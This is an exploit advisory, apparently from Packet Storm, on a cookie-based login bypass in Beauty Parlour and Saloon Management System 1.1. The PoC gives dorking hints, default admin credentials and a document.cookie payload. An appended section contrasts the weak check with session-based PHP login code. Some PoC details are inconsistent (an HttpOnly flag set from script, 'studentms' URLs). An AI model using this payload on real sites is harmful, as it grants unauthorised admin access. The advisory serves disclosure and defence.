Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cookie handling vulnerability.

Packet Storm

Posted Sep 13, 2024

Authored by indoushka


tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e


====================================================================================================
| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)
| # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
====================================================================================================

poc :

[+] Dorking in Google or other search engine.
[+] The default username is admin & The chosen password is user123
[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";
[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php

Greetings to :
==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R
==================================================
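For defenders, the pattern this PoC implies (an admin page that accepts a client-set username cookie as proof of login) is shown below beside a session-based check. This is an added example, not code from the application or the advisory; the function names and the admin_user session key are hypothetical, and the weak check is an assumption inferred from the PoC.

```php
<?php
// Added example with hypothetical names; not the application's own code.

// Weak pattern (assumed from the PoC): any request that carries a non-empty
// "username" cookie is treated as logged in, so the browser decides identity.
function is_admin_weak(array $cookies): bool
{
    return isset($cookies['username']) && $cookies['username'] !== '';
}

// Hardened pattern: identity lives in server-side session state that is only
// written after the password has been verified.
function start_secure_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // send the session cookie over HTTPS only
        'httponly' => true,   // keep the session id out of page scripts
        'samesite' => 'Lax',
    ]);
    session_start();
}

function login(string $user, string $password, string $storedHash): bool
{
    // $storedHash is expected to come from password_hash() at account setup.
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    session_regenerate_id(true);      // new session id on privilege change
    $_SESSION['admin_user'] = $user;  // stored server-side, never in a cookie
    return true;
}

// Call at the top of every admin page, after start_secure_session().
function require_admin(): void
{
    if (empty($_SESSION['admin_user'])) {
        header('Location: login.php');
        exit;
    }
}
```

With the hardened check, a cookie value typed into the browser has no effect because the only cookie the server consults is the opaque session id it issued itself.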
